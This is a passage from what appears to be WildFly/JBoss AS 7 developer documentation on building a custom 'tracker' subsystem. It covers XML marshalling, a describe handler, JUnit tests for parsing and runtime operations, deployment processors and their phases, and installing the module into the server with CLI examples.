Since the address will for example be `\/subsystem=tracker\/type=sar` (defined by\n`TYPE_PATH`) and `TypeAddHandler` is registered for all `type`\nsubaddresses, the `TypeAddHandler` will get invoked for those operations.\nNote that when we are parsing the attribute `tick` we are using the\ndefinition of the attribute that we defined in `TypeDefinition` to parse\nthe attribute value and apply all rules that we specified for this\nattribute; this also enables us to properly support expressions on\nattributes.\n\nThe parser is also used to marshal the model to xml whenever something\nmodifies the model, for which the entry point is the `writeContent()`\nmethod:\n\n[source,java,options=\"nowrap\"]\n----\nprivate static class SubsystemParser implements XMLStreamConstants, XMLElementReader<List<ModelNode>>, XMLElementWriter<SubsystemMarshallingContext> {\n ...\n \/** {@inheritDoc} *\/\n @Override\n public void writeContent(final XMLExtendedStreamWriter writer, final SubsystemMarshallingContext context) throws XMLStreamException {\n \/\/Write out the main subsystem element\n context.startSubsystemElement(TrackerExtension.NAMESPACE, false);\n writer.writeStartElement(\"deployment-types\");\n ModelNode node = context.getModelNode();\n ModelNode type = node.get(TYPE);\n for (Property property : type.asPropertyList()) {\n\n \/\/write each child element to xml\n writer.writeStartElement(\"deployment-type\");\n writer.writeAttribute(\"suffix\", property.getName());\n ModelNode entry = property.getValue();\n TypeDefinition.TICK.marshallAsAttribute(entry, true, writer);\n writer.writeEndElement();\n }\n \/\/End deployment-types\n writer.writeEndElement();\n \/\/End subsystem\n writer.writeEndElement();\n }\n }\n----\n\nThen we have to implement the `SubsystemDescribeHandler`, which\ntranslates the current state of the model into operations similar to the\nones created by the parser. The `SubsystemDescribeHandler` is only used\nwhen running in a managed domain, and is used when the host controller\nqueries the domain controller for the configuration of the profile used\nto start up each server. In our case the `SubsystemDescribeHandler` adds\nthe operation to add the subsystem and then adds the operation to add\neach `type` child.\n
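\nFor the example configuration shown earlier, the `describe` operation\nwould therefore return a list of operations roughly like the following\n(a sketch; the exact formatting of the output may differ):\n\n[source,options=\"nowrap\"]\n----\n[\n {\n \"operation\" => \"add\",\n \"address\" => [(\"subsystem\" => \"tracker\")]\n },\n {\n \"operation\" => \"add\",\n \"address\" => [\n (\"subsystem\" => \"tracker\"),\n (\"type\" => \"sar\")\n ],\n \"tick\" => 10000L\n }\n]\n----\n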
\nSince we are using a `ResourceDefinition` for defining the subsystem, all\nof that is generated for us, but if you want to customize it you can do\nso by implementing it like this.\n\n[source,java,options=\"nowrap\"]\n----\nprivate static class SubsystemDescribeHandler implements OperationStepHandler, DescriptionProvider {\n static final SubsystemDescribeHandler INSTANCE = new SubsystemDescribeHandler();\n\n public void execute(OperationContext context, ModelNode operation) throws OperationFailedException {\n \/\/Add the main operation\n context.getResult().add(createAddSubsystemOperation());\n\n \/\/Add the operations to create each child\n\n ModelNode node = context.readModel(PathAddress.EMPTY_ADDRESS);\n for (Property property : node.get(\"type\").asPropertyList()) {\n\n ModelNode addType = new ModelNode();\n addType.get(OP).set(ModelDescriptionConstants.ADD);\n PathAddress addr = PathAddress.pathAddress(SUBSYSTEM_PATH, PathElement.pathElement(\"type\", property.getName()));\n addType.get(OP_ADDR).set(addr.toModelNode());\n if (property.getValue().hasDefined(\"tick\")) {\n TypeDefinition.TICK.validateAndSet(property,addType);\n }\n context.getResult().add(addType);\n }\n context.completeStep();\n }\n\n}\n----\n\n[[testing-the-parsers]]\n=== Testing the parsers\n\n.Changes to tests between 7.0.0 and 7.0.1\n[NOTE]\n====\nThe testing framework was moved from the archetype into the core JBoss\nAS 7 sources between JBoss AS 7.0.0 and JBoss AS 7.0.1, and has been\nimproved upon and is used internally for testing JBoss AS 7's\nsubsystems. The difference between the two versions is that in\n7.0.0.Final the testing framework is bundled with the code generated by\nthe archetype (in a sub-package of the package specified for your\nsubsystem, e.g. `com.acme.corp.tracker.support`), and the test extends\nthe `AbstractParsingTest` class.\n\nFrom 7.0.1 the testing framework is now brought in via the\n`org.jboss.as:jboss-as-subsystem-test` maven artifact, and the test's\nsuperclass is `org.jboss.as.subsystem.test.AbstractSubsystemTest`. The\nconcepts are the same but more and more functionality will be available\nas JBoss AS 7 is developed.\n====\n\nNow that we have modified our parsers we need to update our tests to\nreflect the new model. There are currently three tests testing the basic\nfunctionality, something which is a lot easier to debug from your IDE\nbefore you plug it into the application server. We will talk about these\ntests in turn; they all live in\n`com.acme.corp.tracker.extension.SubsystemParsingTestCase`.\n`SubsystemParsingTestCase` extends `AbstractSubsystemTest`, which does a\nlot of the setup for you and contains utility methods for verifying\nthings from your test. See the javadoc of that class for more\ninformation about the functionality available to you. And by all means\nfeel free to add more tests for your subsystem; here we are only testing\nthe best case scenario, while you will probably want to throw in a\nfew tests for edge cases.\n
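\nThe tests can be run from your IDE, or with a standard Maven setup from\nthe command line, for example:\n\n[source,options=\"nowrap\"]\n----\nmvn test -Dtest=SubsystemParsingTestCase\n----\n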
\nThe first test we need to modify is `testParseSubsystem()`. It tests\nthat the parsed xml becomes the expected operations that will be passed\ninto the server, so let us tweak this test to match our subsystem. First\nwe tell the test to parse the xml into operations:\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testParseSubsystem() throws Exception {\n \/\/Parse the subsystem xml into operations\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n List<ModelNode> operations = super.parse(subsystemXml);\n----\n\nThere should be one operation for adding the subsystem itself and an\noperation for adding the `deployment-type`, so check that we got two\noperations:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Check that we have the expected number of operations\n Assert.assertEquals(2, operations.size());\n----\n\nNow check that the first operation is `add` for the address\n`\/subsystem=tracker`:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Check that each operation has the correct content\n \/\/The add subsystem operation will happen first\n ModelNode addSubsystem = operations.get(0);\n Assert.assertEquals(ADD, addSubsystem.get(OP).asString());\n PathAddress addr = PathAddress.pathAddress(addSubsystem.get(OP_ADDR));\n Assert.assertEquals(1, addr.size());\n PathElement element = addr.getElement(0);\n Assert.assertEquals(SUBSYSTEM, element.getKey());\n Assert.assertEquals(SubsystemExtension.SUBSYSTEM_NAME, element.getValue());\n----\n\nThen check that the second operation is `add` for the address\n`\/subsystem=tracker\/type=tst`, and that `12345` was picked up for the value of\nthe `tick` parameter:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Then we will get the add type operation\n ModelNode addType = operations.get(1);\n Assert.assertEquals(ADD, addType.get(OP).asString());\n Assert.assertEquals(12345, addType.get(\"tick\").asLong());\n addr = PathAddress.pathAddress(addType.get(OP_ADDR));\n Assert.assertEquals(2, addr.size());\n element = addr.getElement(0);\n Assert.assertEquals(SUBSYSTEM, element.getKey());\n Assert.assertEquals(SubsystemExtension.SUBSYSTEM_NAME, element.getValue());\n element = addr.getElement(1);\n Assert.assertEquals(\"type\", element.getKey());\n Assert.assertEquals(\"tst\", element.getValue());\n }\n----\n\nThe second test we need to modify is `testInstallIntoController()`, which\ntests that the xml installs properly into the controller. In other words,\nwe are making sure that the `add` operations we created earlier work\nproperly. 
First we create the xml and install it into the controller.\nBehind the scenes this will parse the xml into operations as we saw in\nthe last test, but it will also create a new controller and boot that up\nusing the created operations:\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testInstallIntoController() throws Exception {\n \/\/Parse the subsystem xml and install into the controller\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices services = super.installInController(subsystemXml);\n----\n\nThe returned `KernelServices` allows us to execute operations on the\ncontroller, and to read the whole model.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Read the whole model and make sure it looks as expected\n ModelNode model = services.readWholeModel();\n \/\/Useful for debugging :-)\n \/\/System.out.println(model);\n----\n\nNow we make sure that the structure of the model within the controller\nhas the expected format and values:\n\n[source,java,options=\"nowrap\"]\n----\nAssert.assertTrue(model.get(SUBSYSTEM).hasDefined(SubsystemExtension.SUBSYSTEM_NAME));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME).hasDefined(\"type\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\").hasDefined(\"tst\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\").hasDefined(\"tick\"));\n Assert.assertEquals(12345, model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\", \"tick\").asLong());\n }\n----\n\nThe last test provided is called `testParseAndMarshalModel()`. Its main\npurpose is to make sure that our `SubsystemParser.writeContent()` works\nas expected. This is achieved by starting a controller in the same way\nas before:\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testParseAndMarshalModel() throws Exception {\n \/\/Parse the subsystem xml and install into the first controller\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices servicesA = super.installInController(subsystemXml);\n----\n\nNow we read the model and the xml that was persisted from the first\ncontroller, and use that xml to start a second controller:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Get the model and the persisted xml from the first controller\n ModelNode modelA = servicesA.readWholeModel();\n String marshalled = servicesA.getPersistedSubsystemXml();\n\n \/\/Install the persisted xml from the first controller into a second controller\n KernelServices servicesB = super.installInController(marshalled);\n----\n\nFinally we read the model from the second controller, and make sure that\nthe models are identical by calling `compare()` on the test superclass.\n\n[source,java,options=\"nowrap\"]\n----\nModelNode modelB = servicesB.readWholeModel();\n\n \/\/Make sure the models from the two controllers are identical\n super.compare(modelA, modelB);\n }\n----\n\nWe then have a test that needs no changing from what the archetype\nprovides us with. 
As we have seen before, we start a controller:\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testDescribeHandler() throws Exception {\n \/\/Parse the subsystem xml and install into the first controller\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \"<\/subsystem>\";\n KernelServices servicesA = super.installInController(subsystemXml);\n----\n\nWe then call `\/subsystem=tracker:describe`, which outputs the subsystem\nas the operations needed to reach the current state (done by our\n`SubsystemDescribeHandler`):\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Get the model and the describe operations from the first controller\n ModelNode modelA = servicesA.readWholeModel();\n ModelNode describeOp = new ModelNode();\n describeOp.get(OP).set(DESCRIBE);\n describeOp.get(OP_ADDR).set(\n PathAddress.pathAddress(\n PathElement.pathElement(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME)).toModelNode());\n List<ModelNode> operations = super.checkResultAndGetContents(servicesA.executeOperation(describeOp)).asList();\n----\n\nThen we create a new controller using those operations:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Install the describe options from the first controller into a second controller\n KernelServices servicesB = super.installInController(operations);\n----\n\nAnd then we read the model from the second controller and make sure that\nthe two subsystems are identical:\n\n[source,java,options=\"nowrap\"]\n----\nModelNode modelB = servicesB.readWholeModel();\n\n \/\/Make sure the models from the two controllers are identical\n super.compare(modelA, modelB);\n\n }\n----\n\nTo test the removal of the subsystem and child resources, we modify\nthe `testSubsystemRemoval()` test provided by the archetype:\n\n[source,java,options=\"nowrap\"]\n----\n\/**\n * Tests that the subsystem can be removed\n *\/\n @Test\n public void testSubsystemRemoval() throws Exception {\n \/\/Parse the subsystem xml and install into the first controller\n----\n\nWe provide xml for the subsystem installing a child, which in turn\ninstalls a TrackerService:\n\n[source,java,options=\"nowrap\"]\n----\nString subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices services = super.installInController(subsystemXml);\n----\n\nHaving installed the xml into the controller, we make sure the\nTrackerService is there:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Sanity check to test the service for 'tst' was there\n services.getContainer().getRequiredService(TrackerService.createServiceName(\"tst\"));\n----\n\nThis call from the subsystem test harness will call remove for each\nlevel in our subsystem, children first, and validate\nthat the subsystem model is empty at the end.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Checks that the subsystem was removed from the model\n super.assertRemoveSubsystemResources(services);\n----\n\nFinally we check that all the services were removed by the remove\nhandlers:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Check that any services that were installed were removed here\n try {\n services.getContainer().getRequiredService(TrackerService.createServiceName(\"tst\"));\n Assert.fail(\"Should have removed services\");\n } catch (Exception expected) {\n }\n }\n----\n\nFor good measure let us throw in another test which adds 
\n`deployment-type` and also changes its attribute at runtime. So first of\nall we boot up the controller with the same xml we have been using so far\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n    public void testExecuteOperations() throws Exception {\n        String subsystemXml =\n                \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n                \"   <deployment-types>\" +\n                \"       <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n                \"   <\/deployment-types>\" +\n                \"<\/subsystem>\";\n        KernelServices services = super.installInController(subsystemXml);\n----\n\nNow create an operation which does the same as the following CLI command\n`\/subsystem=tracker\/type=foo:add(tick=1000)`\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Add another type\n        PathAddress fooTypeAddr = PathAddress.pathAddress(\n                PathElement.pathElement(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME),\n                PathElement.pathElement(\"type\", \"foo\"));\n        ModelNode addOp = new ModelNode();\n        addOp.get(OP).set(ADD);\n        addOp.get(OP_ADDR).set(fooTypeAddr.toModelNode());\n        addOp.get(\"tick\").set(1000);\n----\n\nExecute the operation and make sure it was successful\n\n[source,java,options=\"nowrap\"]\n----\nModelNode result = services.executeOperation(addOp);\n        Assert.assertEquals(SUCCESS, result.get(OUTCOME).asString());\n----\n\nRead the whole model and make sure that the original data is still there\n(i.e. the same as what was done by `testInstallIntoController()`)\n\n[source,java,options=\"nowrap\"]\n----\nModelNode model = services.readWholeModel();\n        Assert.assertTrue(model.get(SUBSYSTEM).hasDefined(SubsystemExtension.SUBSYSTEM_NAME));\n        Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME).hasDefined(\"type\"));\n        Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\").hasDefined(\"tst\"));\n        Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\").hasDefined(\"tick\"));\n        Assert.assertEquals(12345, model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\", \"tick\").asLong());\n----\n\nThen make sure our new `type` has been added:\n\n[source,java,options=\"nowrap\"]\n----\nAssert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\").hasDefined(\"foo\"));\n        Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"foo\").hasDefined(\"tick\"));\n        Assert.assertEquals(1000, model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"foo\", \"tick\").asLong());\n----\n\nThen we call `write-attribute` to change the `tick` value of\n`\/subsystem=tracker\/type=foo`:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Call write-attribute\n        ModelNode writeOp = new ModelNode();\n        writeOp.get(OP).set(WRITE_ATTRIBUTE_OPERATION);\n        writeOp.get(OP_ADDR).set(fooTypeAddr.toModelNode());\n        writeOp.get(NAME).set(\"tick\");\n        writeOp.get(VALUE).set(3456);\n        result = services.executeOperation(writeOp);\n        Assert.assertEquals(SUCCESS, result.get(OUTCOME).asString());\n----\n\nTo give you exposure to other ways of doing things, instead of\nreading the whole model to check the attribute, we now call `read-attribute`,\nand make sure it has the value we set it to.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Check that write attribute took effect, this time by calling read-attribute instead of reading the whole model\n        ModelNode readOp = new ModelNode();\n        readOp.get(OP).set(READ_ATTRIBUTE_OPERATION);\n        readOp.get(OP_ADDR).set(fooTypeAddr.toModelNode());
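\n        \/\/the NAME parameter selects which attribute to read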
\n        readOp.get(NAME).set(\"tick\");\n        result = services.executeOperation(readOp);\n        Assert.assertEquals(3456, checkResultAndGetContents(result).asLong());\n----\n\nSince each `type` installs its own copy of `TrackerService`, we get the\n`TrackerService` for `type=foo` from the service container exposed by\nthe kernel services and make sure it has the right value\n\n[source,java,options=\"nowrap\"]\n----\nTrackerService service = (TrackerService)services.getContainer().getService(TrackerService.createServiceName(\"foo\")).getValue();\n        Assert.assertEquals(3456, service.getTick());\n    }\n----\n\n[[add-the-deployers]]\n== Add the deployers\n\nWhen discussing `SubsystemAddHandler` we did not mention the work done\nto install the deployers, which is done in the following method:\n\n[source,java,options=\"nowrap\"]\n----\n    @Override\n    public void performBoottime(OperationContext context, ModelNode operation, ModelNode model,\n            ServiceVerificationHandler verificationHandler, List<ServiceController<?>> newControllers)\n            throws OperationFailedException {\n\n        log.info(\"Populating the model\");\n\n        \/\/Add deployment processors here\n        \/\/Remove this if you don't need to hook into the deployers, or you can add as many as you like\n        \/\/see SubDeploymentProcessor for explanation of the phases\n        context.addStep(new AbstractDeploymentChainStep() {\n            public void execute(DeploymentProcessorTarget processorTarget) {\n                processorTarget.addDeploymentProcessor(SubsystemDeploymentProcessor.PHASE, SubsystemDeploymentProcessor.priority, new SubsystemDeploymentProcessor());\n            }\n        }, OperationContext.Stage.RUNTIME);\n\n    }\n----\n\nThis adds an extra step which is responsible for installing deployment\nprocessors. You can add as many as you like, or avoid adding any\naltogether depending on your needs. Each processor has a `Phase` and a\n`priority`. Phases are sequential, and a deployment passes through each\nphase's deployment processors. The `priority` specifies where within a\nphase the processor appears. See `org.jboss.as.server.deployment.Phase`\nfor more information about phases.\n\nIn our case we are keeping it simple and staying with one deployment\nprocessor, with the phase and priority created for us by the maven\narchetype. The phases will be explained in the next section.
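\n\nIf you do need to hook more than one processor into the deployers, additional processors can be registered from the same step. The following is a hypothetical sketch, not part of the tutorial code: `OtherProcessor` and the priority offset are made up for illustration.\n\n[source,java,options=\"nowrap\"]\n----\ncontext.addStep(new AbstractDeploymentChainStep() {\n    public void execute(DeploymentProcessorTarget processorTarget) {\n        \/\/Register our processor, plus a hypothetical second one slightly later in the same phase\n        processorTarget.addDeploymentProcessor(SubsystemDeploymentProcessor.PHASE, SubsystemDeploymentProcessor.priority, new SubsystemDeploymentProcessor());\n        processorTarget.addDeploymentProcessor(SubsystemDeploymentProcessor.PHASE, SubsystemDeploymentProcessor.priority + 1, new OtherProcessor());\n    }\n}, OperationContext.Stage.RUNTIME);\n----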
\n\nThe deployment processor is as follows:\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemDeploymentProcessor implements DeploymentUnitProcessor {\n    ...\n\n    @Override\n    public void deploy(DeploymentPhaseContext phaseContext) throws DeploymentUnitProcessingException {\n        String name = phaseContext.getDeploymentUnit().getName();\n        TrackerService service = getTrackerService(phaseContext.getServiceRegistry(), name);\n        if (service != null) {\n            ResourceRoot root = phaseContext.getDeploymentUnit().getAttachment(Attachments.DEPLOYMENT_ROOT);\n            VirtualFile cool = root.getRoot().getChild(\"META-INF\/cool.txt\");\n            service.addDeployment(name);\n            if (cool.exists()) {\n                service.addCoolDeployment(name);\n            }\n        }\n    }\n\n    @Override\n    public void undeploy(DeploymentUnit context) {\n        context.getServiceRegistry();\n        String name = context.getName();\n        TrackerService service = getTrackerService(context.getServiceRegistry(), name);\n        if (service != null) {\n            service.removeDeployment(name);\n        }\n    }\n\n    private TrackerService getTrackerService(ServiceRegistry registry, String name) {\n        int last = name.lastIndexOf(\".\");\n        String suffix = name.substring(last + 1);\n        ServiceController<?> container = registry.getService(TrackerService.createServiceName(suffix));\n        if (container != null) {\n            TrackerService service = (TrackerService)container.getValue();\n            return service;\n        }\n        return null;\n    }\n}\n----\n\nThe `deploy()` method is called when a deployment is being deployed. In\nthis case we look for the `TrackerService` instance for the service name\ncreated from the deployment's suffix. If there is one it means that we\nare meant to be tracking deployments with this suffix (i.e.\n`TypeAddHandler` was called for this suffix), and if we find one we add\nthe deployment's name to it. Similarly `undeploy()` is called when a\ndeployment is being undeployed, and if there is a `TrackerService`\ninstance for the deployment's suffix, we remove the deployment's name\nfrom it.\n\n[[deployment-phases-and-attachments]]\n=== Deployment phases and attachments\n\nThe code in the SubsystemDeploymentProcessor uses an _attachment_, which\nis the means of communication between the individual deployment\nprocessors. A deployment processor belonging to a phase may create an\nattachment which is then read further along the chain of deployment unit\nprocessors. In the above example we look for the\n`Attachments.DEPLOYMENT_ROOT` attachment, which is a view of the file\nstructure of the deployment unit put in place before the chain of\ndeployment unit processors is invoked.
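\n\nTo illustrate the attachment mechanism itself, here is a minimal sketch that is not part of the example subsystem; `COOL_MARKER` and the processors using it are hypothetical. A processor in an early phase attaches a value, and a processor later in the chain reads it:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/A hypothetical key under which one processor publishes data for later processors\npublic static final AttachmentKey<Boolean> COOL_MARKER = AttachmentKey.create(Boolean.class);\n\n\/\/In an early processor's deploy() method: attach the value to the deployment unit\nphaseContext.getDeploymentUnit().putAttachment(COOL_MARKER, Boolean.TRUE);\n\n\/\/In a later processor's deploy() method: read it back (null if it was never attached)\nBoolean cool = phaseContext.getDeploymentUnit().getAttachment(COOL_MARKER);\n----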
\n\nAs mentioned above, the deployment unit processors are organized in\nphases, and have a relative order within each phase. A deployment unit\npasses through all the deployment unit processors in that order. A\ndeployment unit processor may choose to take action or not depending on\nwhat attachments are available. Let's take a quick look at what the\ndeployment unit processors do in the phases described in\n`org.jboss.as.server.deployment.Phase`.\n\n[[structure]]\n==== STRUCTURE\n\nThe deployment unit processors in this phase determine the structure of\na deployment, and look for sub deployments and metadata files.\n\n[[parse]]\n==== PARSE\n\nIn this phase the deployment unit processors parse the deployment\ndescriptors and build up the annotation index. `Class-Path` entries from\nthe META-INF\/MANIFEST.MF are added.\n\n[[dependencies]]\n==== DEPENDENCIES\n\nExtra class path dependencies are added. For example, if deploying a\n`war` file, the commonly needed dependencies for a web application are\nadded.\n\n[[configure_module]]\n==== CONFIGURE_MODULE\n\nIn this phase the modular class loader for the deployment is created. No\nattempt should be made to load classes from the deployment until *after*\nthis phase.\n\n[[post_module]]\n==== POST_MODULE\n\nNow that our class loader has been constructed we have access to the\nclasses. In this stage deployment processors may use the\n`Attachments.REFLECTION_INDEX` attachment, which is a deployment index\nused to obtain members of classes in the deployment, and to invoke upon\nthem, bypassing the inefficiencies of using `java.lang.reflect`\ndirectly.\n\n[[install]]\n==== INSTALL\n\nInstall new services coming from the deployment.\n\n[[cleanup]]\n==== CLEANUP\n\nAttachments put in place earlier in the deployment unit processor chain\nmay be removed here.\n\n[[integrate-with-wildfly]]\n== Integrate with WildFly\n\nNow that we have all the code needed for our subsystem, we can build our\nproject by running `mvn install`\n\n[source,options=\"nowrap\"]\n----\n[kabir ~\/sourcecontrol\/temp\/archetype-test\/acme-subsystem]\n$mvn install\n[INFO] Scanning for projects...\n[...]\nmain:\n   [delete] Deleting: \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/null1004283288\n   [delete] Deleting directory \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/module\n     [copy] Copying 1 file to \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/module\/com\/acme\/corp\/tracker\/main\n     [copy] Copying 1 file to \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/module\/com\/acme\/corp\/tracker\/main\n     [echo] Module com.acme.corp.tracker has been created in the target\/module directory. Copy to your JBoss AS 7 installation.\n[INFO] Executed tasks\n[INFO]\n[INFO] --- maven-install-plugin:2.3.1:install (default-install) @ acme-subsystem ---\n[INFO] Installing \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/acme-subsystem.jar to \/Users\/kabir\/.m2\/repository\/com\/acme\/corp\/acme-subsystem\/1.0-SNAPSHOT\/acme-subsystem-1.0-SNAPSHOT.jar\n[INFO] Installing \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/pom.xml to \/Users\/kabir\/.m2\/repository\/com\/acme\/corp\/acme-subsystem\/1.0-SNAPSHOT\/acme-subsystem-1.0-SNAPSHOT.pom\n[INFO] ------------------------------------------------------------------------\n[INFO] BUILD SUCCESS\n[INFO] ------------------------------------------------------------------------\n[INFO] Total time: 5.851s\n[INFO] Finished at: Mon Jul 11 23:24:58 BST 2011\n[INFO] Final Memory: 7M\/81M\n[INFO] ------------------------------------------------------------------------\n----\n\nThis will have built our project and assembled a module for us that can\nbe used for installing it into WildFly. If you go to the `target\/module`\nfolder where you built the project you will see the module\n\n[source,options=\"nowrap\"]\n----\n$ls target\/module\/com\/acme\/corp\/tracker\/main\/\nacme-subsystem.jar module.xml\n----\n\nThe `module.xml` comes from `src\/main\/resources\/module\/main\/module.xml`\nand is used to define your module.
\nIt says that it contains the\n`acme-subsystem.jar`:\n\n[source,xml,options=\"nowrap\"]\n----\n<module xmlns=\"urn:jboss:module:1.0\" name=\"com.acme.corp.tracker\">\n    <resources>\n        <resource-root path=\"acme-subsystem.jar\"\/>\n    <\/resources>\n----\n\nIt also has a default set of dependencies needed by every subsystem created.\nIf your subsystem requires additional module dependencies you can add\nthem here before building and installing.\n\n[source,xml,options=\"nowrap\"]\n----\n    <dependencies>\n        <module name=\"javax.api\"\/>\n        <module name=\"org.jboss.staxmapper\"\/>\n        <module name=\"org.jboss.as.controller\"\/>\n        <module name=\"org.jboss.as.server\"\/>\n        <module name=\"org.jboss.modules\"\/>\n        <module name=\"org.jboss.msc\"\/>\n        <module name=\"org.jboss.logging\"\/>\n        <module name=\"org.jboss.vfs\"\/>\n    <\/dependencies>\n<\/module>\n----\n\nNote that the name of the module corresponds to the directory structure\ncontaining it. Now copy the `target\/module\/com\/acme\/corp\/tracker\/main\/`\ndirectory and its contents to\n`$WFLY\/modules\/com\/acme\/corp\/tracker\/main\/` (where `$WFLY` is the root\nof your WildFly install).\n\nNext we need to modify `$WFLY\/standalone\/configuration\/standalone.xml`.\nFirst we need to add our new module to the `<extensions>` section:\n\n[source,xml,options=\"nowrap\"]\n----\n    <extensions>\n        ...\n        <extension module=\"org.jboss.as.weld\"\/>\n        <extension module=\"com.acme.corp.tracker\"\/>\n    <\/extensions>\n----\n\nAnd then we have to add our subsystem to the `<profile>` section:\n\n[source,xml,options=\"nowrap\"]\n----\n    <profile>\n        ...\n\n        <subsystem xmlns=\"urn:com.acme.corp.tracker:1.0\">\n            <deployment-types>\n                <deployment-type suffix=\"sar\" tick=\"10000\"\/>\n                <deployment-type suffix=\"war\" tick=\"10000\"\/>\n            <\/deployment-types>\n        <\/subsystem>\n        ...\n    <\/profile>\n----\n\nAdding this to a managed domain works exactly the same, except that in\nthat case you need to modify `$WFLY\/domain\/configuration\/domain.xml`.\n\nNow start up WildFly by running `$WFLY\/bin\/standalone.sh` and you should\nsee messages like these after the server has started, which means our\nsubsystem has been added and our `TrackerService` is working:\n\n....\n15:27:33,838 INFO  [org.jboss.as] (Controller Boot Thread) JBoss AS 7.0.0.Final \"Lightning\" started in 2861ms - Started 94 of 149 services (55 services are passive or on-demand)\n15:27:42,966 INFO  [stdout] (Thread-8) Current deployments deployed while sar tracking active:\n15:27:42,966 INFO  [stdout] (Thread-8) []\n15:27:42,967 INFO  [stdout] (Thread-8) Cool: 0\n15:27:42,967 INFO  [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:27:42,967 INFO  [stdout] (Thread-9) []\n15:27:42,967 INFO  [stdout] (Thread-9) Cool: 0\n15:27:52,967 INFO  [stdout] (Thread-8) Current deployments deployed while sar tracking active:\n15:27:52,967 INFO  [stdout] (Thread-8) []\n15:27:52,967 INFO  [stdout] (Thread-8) Cool: 0\n....\n\nIf you run the command line interface you can execute some commands to\nsee more about the subsystem.
\nFor example\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource-description(recursive=true, operations=true)\n----\n\nwill return a lot of information, including what we provided in the\n`DescriptionProvider`s we created to document our subsystem.\n\nTo see the current subsystem state you can execute\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource(recursive=true)\n{\n    \"outcome\" => \"success\",\n    \"result\" => {\"type\" => {\n        \"war\" => {\"tick\" => 10000L},\n        \"sar\" => {\"tick\" => 10000L}\n    }}\n}\n----\n\nWe can remove both deployment types, which removes them from the\nmodel:\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=sar:remove\n{\"outcome\" => \"success\"}\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=war:remove\n{\"outcome\" => \"success\"}\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource(recursive=true)\n{\n    \"outcome\" => \"success\",\n    \"result\" => {\"type\" => undefined}\n}\n----\n\nYou should now see the output from the `TrackerService` instances having\nstopped.\n\nNow, let's add the war tracker 